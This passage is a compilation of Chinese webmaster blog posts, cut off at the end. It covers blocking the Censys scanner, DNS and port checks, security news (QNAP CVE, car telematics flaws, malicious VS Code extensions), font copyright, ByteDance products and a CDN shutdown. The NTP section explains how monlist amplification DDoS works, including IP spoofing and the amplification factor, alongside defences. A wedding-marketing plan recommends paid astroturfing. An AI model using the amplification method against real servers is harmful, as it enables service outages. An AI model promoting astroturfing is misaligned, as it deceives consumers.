162.142.125.0/24167.94.138.0/24167.94.145.0/24167.94.146.0/24167.248.133.0/24199.45.154.0/24199.45.155.0/242602:80d:1000:b0cc:e::/802620:96:e000:b0cc:e::/80 2.屏蔽Censys爬虫机器人user-agent:在你的服务器上配置防火墙规则,阻止Censys的user-agent访问你的服务器。Censys的官方已经公布了其user-agent Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) #### 如何预防或避免NTP服务的DDoS攻击 概述 NTP协议(Network Time Protocol)是标准的网络时间同步协议,应用于分布式时间服务器和客户端之间,实现客户端和服务端的时间同步,从而使互联网内所有设备的时间保持同步。它采用层次化时间分布模型。网络体系结构主要包括主时间服务器、从时间服务器和客户机,主时间服务器位于根节点,负责与高精度时间源进行同步,为其他节点提供时间服务,各客户端由从时间服务器经主服务器获得时间同步。 详细信息 NTP服务的DDoS攻击原理 NTP协议是基于UDP协议的服务器、客户端模型,由于UDP协议的无连接性(不像TCP具有三次握手过程)具有天然的不安全性缺陷,黑客正是利用NTP服务器的不安全性漏洞发起DDoS攻击。一般流程如下: 寻找目标,包括攻击对象和网络上的NTP服务器资源。 伪造要“攻击对象”的IP地址向NTP服务器发送请求时钟同步请求报文,为了增加攻击强度,发送的请求报文为monlist请求报文。NTP协议包含一个monlist功能,用于监控NTP服务器,NTP服务器响应monlist指令后就会返回与其进行过时间同步的最近600个客户端的IP地址,响应包按照每6个IP进行分割,最多一个NTP monlist请求会形成100个响应包,具有较强的放大能力。实验室模拟测试显示,当请求包的大小为234字节时,每个响应包为482字节,单纯按照这个数据,计算出放大的倍数是:482*100/234 = 206倍,从而大流量阻塞网络,导致网络不通,无法提供服务。 NTP服务的DDoS防御原理 购买足够大的带宽,硬性抵挡NTP服务的DDoS攻击产生的大流量攻击。 使用DDoS防御产品,将入口异常流量进行清洗,区分正常和异常流量,将正常流量分发给服务器进行业务处理。 通过防火墙对UDP使用的123端口进行限制,只允许NTP服务与固定IP进行通信,其他IP全部拒绝。 关闭NTP服务器monlist功能。 升级NTP服务器版本到4.2.7p26。 #### 如果查看域名DNS在本地电脑是否生效 经常有客户说,网站变更到百度云加速DNS后,网站打不开了…… 其原因是域名变更DNS后,你原来的DNS已经停止解析了,而新的DNS并没有在你本地生效,这就导致了你的域名无法正常访问。 表现为:找不到DNS服务器   域名本地ping显示 请求找不到主机 那么要如何检查域名DNS在本地是否生效呢? 1.首先我们进入电脑运行CMD 2.输入 nslookup 回车键确认 3.输入 set type=ns 回车键确认 4.输入域名(不带WWW的),如:zhujib.com 回车键确认 看到列出至少一个 nameserver = x.x.x.x  这就是你本地网络现在访问域名用的DNS了,如果显示的DNS并不是你最新更新的DNS,也就是旧的DNS,那说明DNS没有更新生效。 这个时候只能等了,更换DNS全球同步要2至48小时左右,如果你想本地快点生效的,可以常尝试更新本地DNS缓存试试,如果还是不行,那就只能耐心等待了。 #### 如果检测服务器IP 80端口是否开放 一般网站的端口号是80,而使用HTTPS的端口是443端口,经常有些站长遇到网站环境都安装好了,但是网页就是打不开的情况。这种原因绝大多数是服务器没有开启网页的端口,比如80端口就是默认的端口。 那么如果检测服务器是否开启80端口呢?方法很简单: 使用站长端口在线检测工具tool.chinaz.com/port 就可以搞定了。 输入服务器IP和要查询的端口即可。非常方便吧,大家可以试试。 #### 威联通 QTS 和 QuTS hero 存在严重漏洞,至少 29000 台设备受到影响 2 月 1 日消息,NAS 厂商威联通(QNAP)近日发布安全公告,表示 QTS 5.0.1 和 QuTS hero h5.0.1 两款软件存在严重漏洞 CVE-2022-27596,允许攻击者在固件中植入恶意代码。 该漏洞在 CVSS v3 评分为 9.8(最高分为 10 分),因此IT之家推荐使用上述两款软件的网友尽快升级。 QNAP 尚未透露有关该漏洞的任何进一步细节。根据 Bleeping Computer 报道,漏洞 CVE-2022-27596 被归类为“SQL 命令中不当使用特殊元素”(SQL 注入)。 运行以下软件版本的设备会受到影响: QTS 5.x QuTS hero h5.x 威联通已经修复了上述漏洞,推荐用户升级到: QTS 5.0.1.2234 build 20221201 及更高版本 QuTS hero h5.0.1.2248 build 20221215 及更高版本 Bleeping Computer 在报告中指出,至少超过 29000 台设备受到影响。Censys 安全研究人员的一份报告进一步指出,在网上发现的 60000 多台 QNAP NAS 设备中,只有大约 550 台打了补丁。 #### 婚纱摄影行业网络营销推广方案 婚纱摄影行业做网络营销相对来说就比较常见了,现在也有许多商家都在投入这一块。那婚纱摄影行业网络营销应该怎么做才会有效果呢?婚纱摄影行业网络推广方法又有哪些呢?怎么依托于网络和新媒体渠道打开婚纱摄影市场? 任何网销的开展,都离不开自身建设,流量引进和订单转化三个方面。 第一,内功品质的提升,网销和其他官方平台的开拓完善。具体包括网站的美观度,可观看性,各个版面之间相互引导和内链,相关内容引导,以及软文编排等等。内功品质的提升是基石,是网销成功的第一步。 网站本身内容的完善度,是考量网销能否成功的基础。由于网销的特殊性,客户基本上只能通过网络来感受我们的产品和服务的好坏。那么,怎么将我们的好的品质和服务通过虚拟的网络,展现到客人面前呢?优美的图片包装和文案包装是一个非常重要的地方。 第二,询问量的提升。询问量的多少,决定了订单量的数额。怎么为网站引流分流也将是本文重点探讨的内容,我将放在以下篇幅详细描述。 第三,转化率的提升。所谓转化率,就是到店成交率和网络转介率。这个包括网上新客户的挖掘和老客户的转介绍。转化率是成交的最为关键的一步。怎样强化网络话术,抓住网络客户的心理,最终订单付款,都是最为重要的一步。牵涉到转化率的因素,主要与网络套餐的设定、摄影风格以及消费者的预期消费金额相关。 这里需要重点提出的就是客照分享、传播以及口碑类型网站的评论。客照分享传播,能够带来不可想象的效果,比如微博分享转发,微信转发等。 口碑类型网站评论,主要是指官方客片评价心得;大众点评网的用户评价,其他还有爱帮网,WED114等渠道,评价心得分享内容是提升旅游外拍摄影后续消费和客单转化的非常重要的步骤。有的负面评论,也是检验自身品质和提升服务很重要的渠道。 下面我们重点讲述下怎么提升询问量? 直白点来讲即是提升官方网站的点击量。主要通过两个渠道,除了我们官方渠道本身的点击,主要的大流量来源就是外来流量的引进。 一、网站流量来源 1、官方网站的优化排名(自然流量) 当网站关键词如婚纱摄影进入百度首页,甚至前三位的时候,自然来的流量就非常的客观。如此搜索引擎优化就显得非常重要。怎么提升网站的自然排名就需要稍为进行SEO的优化推广。特别是相应的长尾关键词的设置推广。 这里当然还有友情链接、及时通讯的设置已经评价分享体系的建立。 2、其他官方渠道或者店铺的排名。 较为明显的有垂直行业的门户网站,比如WED114等 地方上稍有影响力的论坛,比如厦门小鱼网等 全国几大门户网站的店铺或者博客,比如新浪,腾讯等 官方微博、微信的渠道,结合搜索引擎的规律和热点话题的炒作,让自己的作品得到最大程度的曝光,将获得较大的流量。以及淘宝类、电商网站类的合作和团购网站的品牌合作。 二、付费渠道的拓展 1、最为典型的即是百度付费推广,这点是大多数旅游外拍公司采取的及时有效的措施。付费金额50元起不限,还可以深度合作百度品牌推广,所需金额较大。 2、与垂直门户网站、地方性论坛的合作,前者适合全国合作,长久投放;后者短期投放,需要话题炒作。 3、微博、微信等方面的付费推广。 4、网络分销商的开拓,这点并不是大多数摄影机构摆在台面上说出来的,但是深度操作能够得到非常大的效果。这点在淘宝和微信端能够取得预想不到的效果。 三、其他结合线下的推广和网上的异业合作方案 这部分的内容较为丰富。比如与当地旅游景点,酒店等行业的合作,异业合作与上述相似,同时可以拓展到网上的合作互推。效果还是不错的。 运用的较为多见的影楼摄影网络推广方法如下: 1、及时通讯类的营销(QQ、TQ、53客服等)。 2、企业官方网站的推广。 3、官方微博的运营推广。 4、官方微信和小号微信的运营推广。 5、博客类型的推广,做好公关形象,重点推荐到首页话题。 6、论坛推广,这个可以轻易列举全国前100热度的论坛进行软文推广。 7、全国性的分类信息网站,如58同城、赶集网站等,列举全国50个,分地区和城市重点推广。 8、问答型的推广,较为明显有效的有百度问答,新浪问答和腾讯搜搜。 9、搜索引擎的收录。 10、口碑式网站的维护推广,比如点评网、爱帮网、114等可以列举全国前十的网站即可。 11、视频推广,当然不仅仅包括优酷、土豆、腾讯视频等,还有最新热门的微视,分享效果非常好。 12、软文发布、图文推广,gif图片和美图LOGO。 13、病毒式营销,名人效应,水军炒作,微博上面较为多用。 14、基于数据库方面的推广就不多讲了,重点还是在微博粉丝,微信粉丝,老客户群体。 其他有关线下辅导的推广 1、公司产品宣传册,名片等途径。 2、平面媒体、流媒体的广告植入。 3、社会公益性的活动。 4、与摄影行业较为互补性的行业互推,比如景区、酒店、饭店、美容等。 5、时尚流行杂志刊物,以及报纸等。 6、线下活动策划,小圈子聚会等。 四、婚纱摄影行业如何开展网络营销推广 为此,结合XX摄影的网销现状,我们重点分为以下几个步骤来开展网络营销推广工作。 第一步,重点花费一个月的时间,改善和提升官方网站和相关网销渠道的品质,比如样片客片,软文编辑,客户引导等工作。 其中涉及到相应的资源有,官方网站的付费客服软件,其他网站VIP店铺的开通,硬广告的投放等,费用暂未明细化。 第二步,一个月时间进行实操演练,网销部门内部分工精细明确化,固定化网销推广,提升网上客服应答系统,订单转换以及客户转介绍等方面的实操,培养出较为纯熟的客服引导系统,和日常性的网销推广水平。争取获得较高的办事效率。 第三步,全面整合网络资源,进行大流量的引进。分销体系的佣金设定,其他网站的展位的购买,百度推广的加大额度等等。 总结:摄影行业网销是个系统性的工程,牵涉到很多部门的联动工作。需要公司全员参与进来。从客源方面来分析的话,很多用户现在并不一定只会选择拍一次婚纱照,旅游外拍渐形时尚。 如果用鱼塘来形容这个系统的话,网销的初级阶段,就是单纯的捕获鱼,为了成功达到目的,想了N多种的诱饵和方法,有的甚至不惜伤害自身的长远利益。而要做到长远,不竭泽而渔的话,唯有建立自己的鱼塘,开始收获的鱼儿成为鱼妈妈,而原来的鱼塘也不是一个,我们可以多方面多渠道去寻找没有人或者很少人去过的地方,开发多个鱼塘,然后精细化运营。   #### 字体侵权你中招了吗? 这些年被索赔的案例及免费商用字体盘点 为了争夺观众的眼球,设计师常常在商标、LOGO、广告宣传等产品上使用“特殊字体”。随着方正、汉仪等字库公司维权运动的展开,很多企业陆续收到了字库公司的索赔函件。 近日,有位淘宝卖家在群里分享了关于自己的“字体侵权”遭遇:这位卖家称自己的网店被告知字体侵权,并向周围卖家求助。 从上面截图的对话中可看出:该卖家店铺涉及侵权的恐怕还不止这三款字体,并询问卖家如何解决。 看完这一幕,不少人都是懵圈的,有些人甚至没有听说过“字体侵权”。 事实上,因为“字体侵权”而引发的诉讼并不少见。 前不久,北京汉仪科印信息技术有限公司还以侵害著作权及不正当竞争纠纷为由将北京某科技有限公司诉至法院,要求其停止侵权行为并索赔经济损失150万元。 当你在浏览器里搜索“字体侵权”,你会发现,仅一个月内就有4条相关新闻。 “微软雅黑”不是软件自带的么? 实际上,“微软雅黑”是由“北大方正电子有限公司”设计开发的字体作品,方正公司通过协议的形式授权微软公司使用。 不只是“微软雅黑”,很多软件的自带字体都要得到版权方的授权。 未经授权使用,就会收到版权方的侵权诉讼... 2007年 方正起诉暴雪字体侵权并索赔1亿元,2009年索赔金额被追加至4.08亿元,2012年,最高人民法院判决暴雪公司等停止侵权并赔偿北大方正公司经济损失200万元及诉讼合理支出5万元。 2008年 方正起诉广州宝洁因其飘柔等产品包装上使用了倩体字,并索赔134万元,但最终败诉。 2012年 热门影片《失恋33天》,因片头字幕、短信字幕等使用了未授权字体,最终赔付版权方2万元。 2016年 《九层妖塔》因使用了未授权字体中的7个字,就被索赔51万元。 ...... 目前,法院对这类侵权的判决一般为一个字3000-10000元。如果字体设计在产品营利方面起到关键作用,赔偿金额还会更多。 除了赔钱,已经发出的宣传品需要撤回,应对法律纠纷也需要不小的投入,企业和品牌在这方面也要承受不小的经济损失,以及形象宣传上的不利局面。 常用字体为什么涉嫌侵权 在网上,我们看到很多类似“我收到了方正的提示函怎么办”的问题,很多人认为方正就像某些卖图“钓鱼”的公司一样,想钱想疯了。 事实上,侵权与维权的背后不只是利益的撕扯,还有关于创意价值认可的较量。 比如,2007年方正诉暴雪字体侵权的案子,当时方正索赔1亿元,2009年索赔金额又升至4.08亿元,引发各界争议。此案折腾了近五年,于2012年5月做出终审判决,判定暴雪等被告方赔偿200万元。 然而,方正胜诉的背后依然问题重重,这不但与方正的索赔金额相去甚远,甚至比照方正为一审、二审付出的400多万元诉讼费也差了一大截。 时任方正副总裁的刘晓昆十分感慨:侵权的《魔兽世界》在其他国家发行时,使用其他国家的文字字体都标注了著作权人,为什么在中国不这样做呢? 据业内人士介绍,单纯设计一款字体不容易,一个字库少则需要五六千字,多的能达到一两万字,每个字都需要设计师一笔一画地仔细勾勒、调整,通常设计一套风格字库需要设计1万左右的字符+标点符号,几个人的团队少则半年,多则两三年才能开发出来。 而漫长的开发过程和昂贵的开发费用必须要依赖于后期的大量销售,一款字体才能赚钱。 所以,作为字体的使用者,我们规矩点总没错,对于版权方给予应有的尊重和理解,我们可以烦可以骂,但是最终还是得依法做事。 哪些字体是免费的 网页设计使用的中文字体,免费的字体包括宋体、仿宋、黑体、楷体、隶书、幼圆。这些字体通行已久版权无法追溯。伪免费商用的微软雅黑字体,其实在浏览器显示是IE浏览器时不算侵权,但是使用到广告设计或者商家自用的装饰设计,一定要非常小心。 思源字体系列 思源系列字体由谷歌公司与Adobe在线字体库Typekityu合作开发,为谷歌在中日韩范围内使用的界面提供了7中大小粗细不同的黑体字:ExtraLight、Light、Normal、Regular、Medium、Bold 和 Heavy,完美覆盖了汉字全体系。 思源黑体属于无衬线字体,在PC、wap界面上的显示效果都非常出众。中规中矩的字形让懒一点的设计师即使不做变形处理也不会侵权。 思源宋体属于有衬线字体,笔画头尾有汉字细节,适合中式排版和内页正文段落。目前有思源黑体和思源宋体系列可以免费商用。 方正免费字体系列 没错,方正也还是有免费系列的。作为设计师使用最多的、字库最大的供应商,方正的字体风格丰富、字形优美、品质精良、适用场景广都是设计师偏爱的理由。 实在无法舍弃,就使用方正黑体、方正书宋、方正仿宋和方正楷体这几款免费商用的字体系列吧。 文鼎字体系列 文鼎字库也是设计师常接触到的。以前很多文鼎字体是可以免费商用的,现在只剩下4个:文鼎PL细上海宋、文鼎中楷简/繁、文鼎报宋简。 文泉驿字体系列 文泉驿汉字字体项目完全开源,由旅美学者房骞骞(FangQ)于2004年10月创建,致力于解决GNU/Linux高质量中文字体匮乏的状况。 目前,文泉驿已经开发并发布了第一个完整覆盖GB18030汉字(包含27000多个汉字)的多规格点阵汉字字库,第一个覆盖GBK字符集的开源矢量字库(文泉驿正黑),并提供了目前包含字符数目最多的开源字体——GNU Unifont——中绝大多数中日韩文相关的符号。 这些字库已经逐渐成为主流Linux/Unix发行版中文桌面的首选中文字体。 目前Ubuntu、Fedora、Slackware、Magic Linux、CDLinux使用文泉驿作为默认中文字体,Debian、Gentoo、Mandriva、ArchLinux、Frugalware则提供了官方源支持,而FreeBSD则在其ports中有提供。 王汉宗自由字体 王汉宗教授是中原大学数学系教授,独立设计研发天蚕字库。先后分别在2000年和2004年捐赠了十套WCL系列字型和32套字库。以GNU GPL许可发布的。虽然难得的全网永久免费但字体类型跟文鼎字库字体十分接近,使用时还是要注意一下。 为了避免争议,在此还是声明一下:王汉宗中仿宋、王汉宗中仿宋简体、王汉宗隶书体、王汉宗中明体、王汉宗粗明体、王汉宗特明体、王汉宗细圆体、王汉宗特圆体、王汉宗迭圆体、王汉宗勘亭流、王汉宗综艺体、王汉宗中行书、王汉宗综艺体双空阴、王汉宗粗楷体简体。没提到的其他部分的王汉宗字体请无脑放心使用。 Droid Sans Fallback 别看是英文标题,该字库是谷歌为推出Android设备,委托台湾华康科技为东南亚各国字符设计的字体,字体效果非常类似微软雅黑,完美涵盖简/繁体中文、韩文、日文,并且完全免费。 站酷字体系列 作为设计师活跃的国内几大平台之一,站酷除了购买自用的版权之外,还自发组织平台优秀设计师集体创作设计了多款免费艺术字体,并对全网无条件永久免费商用。 站酷字体系列包含了全库汉字、数字和英文字母,基本上涵盖了使用的所有情景。站酷酷黑、站酷高端黑、站酷快乐体、站酷意大利体(英文)都是开放免费使用的。字体的粗犷和随意也很适合用在创意设计和广告图上,虽然还不够精美但是已经够用了。 濑户字体 濑户字体是比较小众的一款,名字听起来很和风,却是一款中文字体。字体风格偏手写,适合海报和广告上使用。 来源:来自未来的人类 #### 字节跳动上线“头条百科” 此前全资收购“互动百科” 4月20日 消息:近日,字节跳动在移动端网页上线了“头条百科”产品,Slogan为:来这里,认识世界!域名为baike.com。目前“头条百科”仅能在移动端网页查看,通过PC端查看仍为“互动百科”页面。 此前,字节跳动已完成了对“互动百科”的全资收购。 去年9月,字节跳动已完成对互动百科的全资收购,持股100%。其中,互动百科所属公司北京互动百科网络技术股份有限公司大股东为北京互动极致科技有限公司,占股77.78%,第二大股东为北京量子跃动科技有限公司,占股22.22%。而这两大股东均由北京字节跳动科技有限公司100%持股。 今年 3 月,互动百科发布公告称,将于 2020 年 4 月 30 日进行网站改版升级,原互动百科网站用户服务将下线,用户可通过申请新的账号使用百科产品。同时,百科商城将下线,在互动百科尚有百科币未兑换的用户,请在 2020 年 4 月 30 日前登陆百科商城,申请百科币礼品兑换。 资料显示,互动百科,原称互动维客,于 2005 年创建, 2013 年 1 月,互动百科词条超过 1300 万条、 5 万个分类、 68 亿文字、 721 万张图片。 目前PC版已经计划4月30日升级了,估计升级后会全面变成头条百科了。 #### 字节跳动也玩百科了?全新百科产品“识典百科”开放测试 6月7日 消息:据Tech星球消息,近期,字节正测试一款全新的百科产品“识典百科”,其使命是“记录知识,传承文明”。 据悉,识典百科网址为:https://shidianbaike.com/。在测试页面可以看到,除了首页和导航,识典百科包含了“编辑社区”、“最近更改”和“上传文件”等多个功能,另外识典百科还提供“可打印版”,即用户可以将流量的百科页面进行打印。 根据官方介绍,识典百科为用户提供以下服务: 免费访问和阅读我们的所有条目和相关内容;在开放的许可下共享和重复使用我们的内容;在我们平台上贡献和编辑各项项目;加入各项有意义的讨论;使用我们为激发创造和提高编辑效率的工具和素材; Tech星球报道称,消息人士透露,识典百科将专注于专业知识和文化方面。 #### 字节跳动搜索引擎“头条搜索”网页版上线 体验不比百度差 新浪科技讯 8月10日下午消息,今日,新浪科技发现头条搜索已悄然上线,网址为https://m.toutiao.com/search,现只有简单的搜索页面,slogan为:搜你想搜的。目前,在手机应用市场尚未看到相关App上线。 此前,8月1日字节跳动通过“字节跳动招聘”公众号首次公开了布局搜索引擎的动作。文章提到,字节跳动已建立搜索部门,搜索团队正在全力打造出一个理想的搜索中台架构。而该搜索引擎是今日头条、抖音、西瓜、火山、懂车帝等多款App的“幕后支持者”。该项目已运作上万台机器。 从信息流延展到搜索领域,业界认为字节跳动将于百度在搜索领域展开竞争。 值得注意的是,百度目前也在打“搜索+信息流”双引擎,其中将通过“百家号+智能小程序”打造内容生态。 8月8日,百度App业务部总经理平晓黎在回答媒体关于市场竞争提问时表示,“持续有新的入局者也说明搜索依然是被大家看好的市场,因为搜索确实是用户的刚需之一。” 平晓黎认为,搜索和信息流这两个产品非常的不一样,搜索依靠的技术门槛非常高。“搜索这个赛道一直不乏竞争,平均两年有一个入局者,而百度所占的份额一直在80%以上。” 如今随着头条搜索的上线,未来百度市场份额是否会受影响、两家会如何竞争等问题也将受到外界持续关注。(雪梅) 主机吧测试了下,目前搜索非常简洁 搜索结果也非常丰富,技术上不比360搜狗差,表面上不比百度差。 特别是长尾词方面,体验跟百度差不多,期待头条搜索雄起! #### 字节跳动搜索部门招聘员工,要打造全网搜索对抗百度? 8月1日 消息:昨天,字节跳动招聘官方公众号正式对外发布了一则关于字节跳动搜索部门招聘员工的公告,并称搜索团队将从 0 到 1 打造一个通用搜索引擎,并且是全网搜索。 据招聘公告显示,字节跳动搜索部门支持着字节跳动全线产品的搜索功能,团队有来有来自公司推荐/广告/AILab团队的技术精英,有从Google/百度/Bing/ 360 搜索团队的搜索技术骨干。 字节跳动官方还介绍称,搜索团队跑在NLP、推荐等技术的最前线,应用大规模机器学习等方法,同时也在研究更适合搜索的秘密武器。 字节跳动搜索团队新员工的工作感受也透露出一些关于字节跳动搜索引擎的内容,其中新员工陈同学表示,大家一起挑战全网搜索引擎从无到有和万亿级数据量所带来的算法和架构难题,除了传统搜索引擎的做法,这里还有一些更前沿的尝试并卓有成效。 #### 字节跳动旗下时光相册APP停止运营 11月15日 消息:此前,字节跳动旗下的时光相册宣布将正式停止运营,引发了众多网友的关注和热议。 根据公告,自2023年11月15日0时起,时光相册APP将正式停止运营。所有功能停止使用,同时关闭所有App下载入口。 这意味着,用户将无法再使用这些功能,并且所有存储在时光相册中的照片和视频也将被清除。 据悉,时光相册是一款主打亲密共享的智能云相册App,曾因其便捷的功能和出色的用户体验而受到用户的喜爱。时光相册的停运让许多用户感到惋惜和不舍。 #### 字节跳动正式推出“头条搜索”APP 已在各大安卓商店上线 2月28日 消息:近日,由字节跳动开发的“头条搜索”正式推出APP。目前,“头条搜索”APP已在各大安卓应用商店上线。App版全新Slogan为:“头一条就是你想搜的”。 此前,字节跳动已推出了网页版头条搜索。 去年3月,今日头条开始在开屏广告推广“头条全网搜索”,字节跳动方面回应称:“搜索已经上线,这是今日头条“信息创造价值”理念的延伸。用户可通过今日头条上面的搜索框进行试用。 去年 7 月,字节跳动旗下微信公众号“字节跳动招聘”发布消息称,字节跳动将从 0 到 1 打造一个通用全网搜索引擎,覆盖了今日头条、抖音、西瓜、火山、懂车帝等产品。 去年 8 月,今日头条正式推出网页版头条搜索,(m.toutiao.com/search),slogan为“搜你想搜的”。 去年 11 月,头条搜索站长平台上线,为站长提供有助于搜索引擎收录的工具、站点数据查询、资源开放等服务。并提供三大功能:sitemap提交、死链提交、收录索引量查询。 #### 字节跳动静态资源公共库下线啦——免费 CDN 时代的又一次告别 8 月 12 日傍晚,当不少站长打开浏览器调试窗口时,发现所有从 cdn.bytedance.com 加载的 JS、CSS、字体文件全部返回 404。页面随之错乱,按钮失去交互,主题样式一夜“裸奔”。字节跳动在域名根目录挂出了一行极简公告: “因黑产原因已下线,请不要再使用。” 一句话,为这条服务了数年的免费 CDN 画上句号,也给仍依赖它的无数个人博客、中小企业官网和开源主题带来了措手不及的“暴击”。 一、从“小范围抽风”到“全面停摆” 其实早在 2025 年 6 月,站长群里就陆续出现“字节 CDN 抽风”的吐槽:jQuery 还能拉下来,自家的图标字体却 404;今天某张背景图加载 5 秒超时,明天又神奇恢复。 彼时大家以为只是节点故障,官方会修。结果两个月过去,故障范围越来越大,字节最终选择直接拔网线——与其持续投入安全对抗,不如彻底关掉这项“纯公益”服务。 二、“黑产”究竟指什么? 官方公告只有冷冰冰的四个字,但圈内推测主要集中在两种可能: 流量劫持与恶意投毒黑灰产利用公共 CDN 缓存机制,篡改前端资源插入暗链、挖矿脚本或钓鱼页面。由于 CDN 边缘节点众多,溯源、清洗成本极高。 DDoS 勒索与流量滥用高并发、大带宽的免费 CDN 天然适合被当作“子弹”——攻击者将海量恶意流量导向目标站点,事后勒索保护费。字节若持续兜底,就要为黑产买单。 无论真相是哪一种,“免费”与“无门槛”在中文互联网环境里,最终都容易被薅成一地羊毛。 三、连锁反应:那些一夜之间“裸奔”的网站 个人博客与开源主题知名 Typecho 主题 Handsome 曾把 jQuery、Prism.js、Font Awesome 全部指向字节 CDN,如今站长要么改本地文件,要么紧急替换 cdnjs、jsDelivr 等备用源,否则代码高亮、评论区、夜间模式统统罢工。 中小企业官网部分公司官网在上线时为了“省事”,全局引用了 cdn.bytedance.com 的 Vue、Element-UI。运维一觉醒来发现首页变成乱码列表,老板群里疯狂 @ 全员排查。 SEO 与广告收入页面长时间空白会触发搜索引擎降权;广告联盟也因加载异常暂停投放。对流量站来说,这直接关乎钱包。 四、“免费 CDN 依赖症”的集体反思 字节并不是第一家倒下的公共库。七牛、360、百度、新浪 SAE……过去几年,国内免费 CDN 接连关停或限流,理由如出一辙:成本、合规、黑产。 这场持续的下线潮给开发者留下了三点教训: 不要把可托管在自己域名下的核心资源交给第三方。哪怕多花一点流量费,也要把主动权握在手里。 构建冗余方案。同时准备 2–3 个 CDN 源 + 本地兜底,一旦上游故障可无缝切换。 关注供应链安全。公共库投毒事件屡见不鲜,锁定版本、Subresource Integrity(SRI)校验不能省。 五、后字节时代,我们该用谁? 国际公共 CDNcdnjs、jsDelivr、unpkg 目前仍正常,但国内访问质量参差,需做好节点测速与 fallback。 国内云厂商付费方案阿里云 OSS + CDN、腾讯云 COS + CDN、华为云 OBS,按量计费价格低廉,且支持 HTTPS、回源、缓存刷新等完整功能。 本地化构建Webpack/Vite 等构建工具直接打包到 dist,上传自己域名。虽然失去“免费全球加速”,但换来可控、安全、0 依赖。 六、写在最后 从新浪 SAE 到字节 CDN,中国互联网的“免费午餐”正一道道撤桌。曾经我们享受巨头提供的流量红利,如今必须为“稳定”与“安全”付出成本。也许这并不是坏事——当免费不再理所当然,开发者才会真正重视基础设施的投入与治理。 下一次再看到“某某公共库即将停止服务”的热搜时,希望我们已经学会把资源握在自己手里,而不是在 404 的夜里手忙脚乱。 #### 宁夏回族自治区ICP用户注销备案申请表.docx 填 表 须 知 (本页为填表须知,不必打印,请下载打印申请表) 以上表格内信息均为必填项,请填写完整。 本申请表仅用于无网络接入企业的空壳网站用户或空壳主体用户注销备案。若网站有网络接入企业为其提供网络服务,需通过接入企业备案系统自行提交注销申请。 申请类别以实际情况进行选择。注销本单位(个人)备案信息的请勾选“注销本单位备案”;注销其他单位(个人)备案信息的请勾选“注销他单位备案”。(注销他单位备案前请提前与该单位联系,避免纠纷) 申请依据以实际情况进行选择。主体依据,即本单位或者本人不再使用该备案。域名依据,即域名已备案,但备案主体非域名持有者,如你单位注册的域名在备案时显示冲突(该域名之前被其他企业备案过),需先注销他单位备案后,才可正常备案。备案情况,请先在工业和信息化部ICP/IP地址/域名信息备案管理系统(https://beian.miit.gov.cn)的“ICP备案查询”中,查询该域名备案信息,再根据查询结果填表。注销申请时请对应具体情况说明注销原因。 备案号分为主体备案号和网站备案号两种; 主体备案号格式为“宁ICP备XXX号” 网站备案号格式为“宁ICP备XXX号-1” 注销申请者必须提供以下材料: (1)备案主体为单位:提供此申请表、单位有效证件复印件(如:公司营业执照、事业法人执照或组织机构代码证)、域名证书复印件、法人身份证复印件,并均加盖本单位公章。 (2)备案主体为个人:提供此申请表、主办者身份证复印件、域名证书复印件。 若申请者为单位,申请表须盖公章;若申请者为个人,须手写签名。 递交方式: 快递或者送至宁夏通信管理局(宁夏银川市北京中路信通大厦主楼九层908,宁夏通信管理局收,邮编:750011) 自收到申请后5个工作日内给予处理,请申请人自行在工业信息化部备案系统(https://beian.miit.gov.cn)“ICP备案查询”核实处理结果。 8.咨询电话: 0951-6198315。 #### 安全专家发现汽车漏洞:可远程解锁车门、按喇叭、启动引擎 1月8日消息,据报道,有安全专家近日发现了影响数百万辆汽车的安全漏洞,全球几乎所有主要汽车品牌均受影响。 黑客可以利用汽车远程信息处理系统、汽车API和支持性基础设施中的漏洞进行各种操作,甚至可以远程完全接管你的汽车。 诸如奔驰、宝马、劳斯莱斯、法拉利、福特、保时捷、丰田、捷豹和路虎等汽车品牌,还有车队管理公司Spireon和数字车牌公司Reviver均受到影响。 报道称,Yuga实验室的Sam Curry在研究破解汽车过程中,在现代和Genesis的多款车型中发现了漏洞,并发现Sirius XM的Connected Vehicle Services漏洞影响本田、日产、英菲尼迪和Acuras。 Curry表示:受影响的公司都在报告后的一两天内修复了这些问题。我们与所有这些公司合作,对其进行验证,并确保不会绕过这些漏洞”。 基于Curry的漏洞研究,安全专家又陆续发现了多个波及范围很广的安全漏洞。从公共安全的角度来看,最严重的漏洞是在Spireon发现的。 该公司拥有几个GPS车辆跟踪和车队管理品牌,包括OnStar、GoldStar、LoJack、FleetLocate和NSpire,覆盖1500万辆联网车辆。 研究人员写道:这将使我们能够跟踪和关闭一些不同大城市的警察、救护车和执法车辆的启动器,并向这些车辆发出指令”。 攻击者甚至可以从这个面板上向所有1500万辆汽车发送任意命令,从而远程解锁车门、按喇叭、启动引擎和禁用启动器。 目前,受漏洞影响的车企,还未对此做出更多解释说明。 #### 安全公司曝光微软 VS Code 第三方插件库暗藏恶意木马,加密受害者隐私信息换取虚拟货币 3 月 23 日消息,继 NPM、PyPI 平台后,安全公司 ReversingLabs 曝光目前微软 VS Code 的插件库也遭黑客滥用,大量黑客在相应平台中上传带有木马的插件,不知情的开发者安装后即中招。 相应安全公司举例两款恶意插件“ahban.shiba”和“ahban.cychelloworld”, 这两款插件均隐含恶意脚本,在安装后即会通过黑客架设的 C2 服务器下载 PowerShell 脚本,进一步在受害者设备中安装勒索木马。 相应木马会在受害者桌面上新建一个名为“testShiba”的文件夹,并将用户的隐私数据加密后复制到其中,用户点击便会显示黑客预设的勒索信息,要求用户支付 1 个虚拟货币作为赎金,以换取解密密钥。 值得注意的是,这些恶意插件上架接近 4 个月后才被发现,而安全人员 Italy Kruk 透露,他们在去年 11 月底就发现了这款名为“ahban.cychelloworld”的恶意插件,随后提报给微软,但微软并没有进行处理。 后来,黑客又为相应恶意插件迭代了 5 个版本,甚至全部顺利通过了微软的审核流程。据此,Italy Kruk 认为微软可能需要调整审核机制来应对这种情况。 #### 安全公司被黑客入侵 多项内部资料被获取 4 月 5 日消息,综合外媒 HackRead、The Register 等媒体报道,有黑客“CoreInjection”在地下论坛 BreachForums 发帖声称成功侵入安全公司 Check Point,成功窃取了一批内部资料。 该黑客透露,相应内部资料包括项目数据、软件源码、用户账户密码、员工联系方式等,黑客同时将相应资料打包,标价 5 个 BTC 进行出售。 对此,Check Point 表示,他们已掌握相关信息,并指出这些资料在去年 12 月便遭黑客窃取,原因是某个门户网站的账户密码泄露,导致黑客撞库,只有 3 个组织的租户受到影响,并且相应泄露内容仅涉及部分 Check Point 员工的电子邮件名单,并未影响客户系统、生产环境及安全架构。 此外,Check Point 